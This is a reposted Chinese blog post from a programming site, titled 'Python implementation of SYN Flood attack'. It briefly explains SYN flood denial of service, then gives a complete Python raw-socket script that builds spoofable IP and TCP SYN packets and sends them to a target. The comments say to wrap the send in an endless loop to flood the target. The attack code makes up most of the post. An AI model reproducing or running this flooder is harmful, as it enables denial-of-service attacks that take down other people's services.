码迷,mamicode.com
首页 > 编程语言 > 详细

Python实现SYN Flood攻击

时间:2015-05-17 13:34:36      阅读:262      评论:0      收藏:0      [点我收藏+]

标签:

 0×00 背景

SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。

0×01 Code

本文章的目是介绍使用python构造packet的方法。
使用raw socket来发送packets。 该程序只适用于Linux。windows可以尝试调用winpcap。

‘‘‘
    Syn flood program in python using raw sockets (Linux)
    
    Silver Moon (m00n.silv3r@gmail.com)
‘‘‘
 
# some imports
import socket, sys
from struct import *
 
# checksum functions needed for calculation checksum
def checksum(msg):
    s = 0
    # loop taking 2 characters at a time
    for i in range(0, len(msg), 2):
        w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
        s = s + w
    
    s = (s>>16) + (s & 0xffff);
    #s = s + (s >> 16);
    #complement and mask to 4 byte short
    s = ~s & 0xffff
    
    return s
 
#create a raw socket
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error , msg:
    print ‘Socket could not be created. Error Code : ‘ + str(msg[0]) +‘ Message ‘ + msg[1]
    sys.exit()
 
# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    
# now start constructing the packet
packet = ‘‘;
 
source_ip = ‘192.168.1.101‘
dest_ip = ‘192.168.1.1‘ # or socket.gethostbyname(‘www.google.com‘)
 
# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20  # python seems to correctly fill the total length, dont know how ??
id = 54321  #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10  # python seems to correctly fill the checksum
saddr =socket.inet_aton ( source_ip )  #Spoof the source ip address if you want to
daddr = socket.inet_aton ( dest_ip )
 
ihl_version = (version << 4) + ihl
 
# the ! in the pack format string means network order
ip_header = pack(‘!BBHHHBBH4s4s‘, ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
 
# tcp header fields
source = 1234   # source port
dest = 80   # destination port
seq = 0
ack_seq = 0
doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = socket.htons (5840)    #   maximum allowed window size
check = 0
urg_ptr = 0
 
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) +(ack << 4) + (urg << 5)
 
# the ! in the pack format string means network order
tcp_header = pack(‘!HHLLBBHHH‘, source, dest, seq, ack_seq, offset_res, tcp_flags,  window, check, urg_ptr)
 
# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)
 
psh = pack(‘!4s4sBBH‘, source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header;
 
tcp_checksum = checksum(psh)
 
# make the tcp header again and fill the correct checksum
tcp_header = pack(‘!HHLLBBHHH‘, source, dest, seq, ack_seq, offset_res, tcp_flags,  window, tcp_checksum , urg_ptr)
 
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header
 
#Send the packet finally - the port specified has no effect
s.sendto(packet, (dest_ip , 0))    # put this in a loop if you want to flood the target
 
#put the above line in a loop like while 1: if you want to flood

注意:运行时需要Root权限。

Python实现SYN Flood攻击

标签:

原文地址:http://www.cnblogs.com/ye1031/p/4509481.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!